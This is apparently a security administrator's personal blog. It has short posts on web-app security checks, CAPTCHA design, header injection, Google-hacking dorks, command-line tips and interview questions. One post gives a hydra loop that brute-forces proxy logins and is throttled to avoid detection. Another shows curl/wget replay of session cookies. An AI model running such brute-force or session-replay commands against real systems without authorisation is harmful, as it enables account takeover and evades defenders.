08:32 pm: I'm looking for a job
I work as security administrator in "Information systems security group" of MTS-Ukraine.
I'm looking for CISO position. Have wide skills in IT security, system administration, programming, audit, incident response.

Complete CV i available here:
  http://docs.google.com/Doc?id=dhdxn2g6_3g5bxk5

11:37 am: Quick and dirty test of Web-interface
For most of the web applications it easy and reliable to perform a basic security checks:

- if web-server by it self has vulnerabilities, the quickest way is
to scan it with nikto and nessus
- check if it possible to make actions without authorization, the
quickest way is to record admin actions with Paros and replay it with
session id of ordinary user or just without session id.
- check csrf in a similar way
- check the inputs for SQL injection (" and '), XSS (",',<,>)

05:29 pm: CAPTHA
This is my requirements for a strong CAPTCHA:

1. Captcha should be white,black with gradations of the color
2. After each login attempt, Session ID should be regenerated with corresponding capcha, thus preventing using the same capcha with different logins and same session id.
3. No information about captcha should be provided to user except captcha by itself
4. Program should use different font for each captcha. (more than a hundred)
5. There should not be empty space between characters, e.g. each character should be connected with neighbors at least in two points, the thickness of connections should
be similar to thickness of lines in place of connections.
6. There should be a line which connects all characters. The trajectory of lines changes randomly, there should not be angles in line (it should be smooth).
7. The size of character path line should change randomly on the same character.
8. The character set should include a-z0-9,similar characters should handled in a good way (o and 0 for example should handled as the same character.
9. The phrase length should consist of 8 random characters.
10. The trajectory of the phrase should change smoothly and randomly.
12. The location of the phrase should be selected randomly on the phone.
13. For each character random non-affine transformation should be applied.
14. The should be a noise over the fone with different density over the layer.
15. There should be an increased interval after unsuccessful logins.
16. Captcha should be recognized by human.

05:29 pm: New old header injection
Recently I've read a fresh post in web security maillist about header injection in Content-Disposition. Really a nice feature, and some sites really seems to be vulnerable. After a bit google on key words:


on the third page I've found affected site. The following request:


returns a nice batch file instead of supposed pdf. Several sites on the first two pages has new PHP with header protection and where not affected. So be up to date with your software and validate user input.

05:01 pm:

MMS for hackers quick start

IP stack and web standards are integrating more and more with mobile devices. Using IP instead of SS7 gives a lot of benefits, but provides much more risk as well.
Here we will describe the basic tools an technologies you need to check the strengthens of MMS infrastructure of your Cell operator. This is not a complete and perhaps correct explanations, but it will give you a quick start. Google docs version can be found here:
  http://docs.google.com/Doc?id=dhdxn2g6_47fntwbdgf


Tags: mms

10:02 pm: Generate anonymous ssh-key
Default ssh-keygen behavior leaves user@host comment in the generated keys.
Some times it is not desired, so you can use:
ssh-keygen -t rsa -C anonymous

Tags: anonymous

05:07 pm:

Using Google Hacking Database with Google AJAX Search API and custom search engines

This article is intended for security specialists, system administrators and all those who want to check web sites for obvious security flaws. It is difficult to automatically check all 1500 entires in GHDB using standart google web interface. This article shows how to utilize new AJAX Search API for this task.
Link to google docs: http://docs.google.com/Doc?docid=dhdxn2g6_5dw4qtwhr

05:39 pm: urlencode in command line
There's millions way to do this, but my is:

root@love:~# cat /usr/local/bin/urlencode
#!/usr/bin/perl

use CGI;
print CGI->escape($ARGV[0]);

11:15 pm: Questions on interview
On interview people often ask interesting questions.

There were two main:
1) what first steps after incident detection (on remote network server)
2) secure network arcitecture for remote admins to internal LAN
3) latest OpenSSL vulnerability known
4) Is it possible to break jail and chroot
5) which branch of apache is better from security point of view

To reduce questions for other interviers. I've told:

1) Port down . Think not so bad, the same said at:
http://tldp.org/HOWTO/Security-HOWTO/after-breakin.html
(the first link while google by "what to do after incident detected"

04:00 pm: simple hydra script for testing proxy logins
for i in `cat squid_logins.txt | xargs echo`
do
hydra -l ${i} -t 1 -e ns -P passwords -s 80 proxy-host http-proxy | tee -a results
sleep 1
done

The sleep is need because clever admins can check a hi rate of connections. For a pity hydra in my opinion is not the best password brute forcer, I've been unable to limit it connection rate without ugly scripts , and for http-post it crashes on my system :-(

03:46 pm: useful command line calls for web testing
wget https://url --post-data="param=value" --no-check-certificate --no-cookies --header "Cookie: JSESSIONID=XXXXXXXXXXX"

However I'd prefer curl:

curl -b "JSESSIONID=XXXXXXXXXXXXX" http://url?`cat get_file` -d `cat post_file` -k

12:27 pm: webscarab & jsp
webscarab default pattern for excluding requests interception contains "js" which covers jsp as well, so you should remove, or change to something else.

12:52 pm: My article about root CA (in Russian)
There it is:
http://docs.google.com/Doc?id=dhdxn2g6_2h2xnz6

P.S. Igor Chubin (xgu.ru) gently pointed me to "openca". Perhaps it is a good alternative as well.

12:38 pm: I've been struggling for a while with exporting local security policy. secedit.exe /export /cfg is not working on XP! (2003 is fine). There is a known bug:
  http://support.microsoft.com/kb/889532

For a pity a hot fix is not publicly available.
You can order it (for free) at:
  http://support.microsoft.com/kb/897327/

Just check that you've selected the correct localization. The problem is that this method is not applicable for vendor solutions, where every windows patch is tested :-(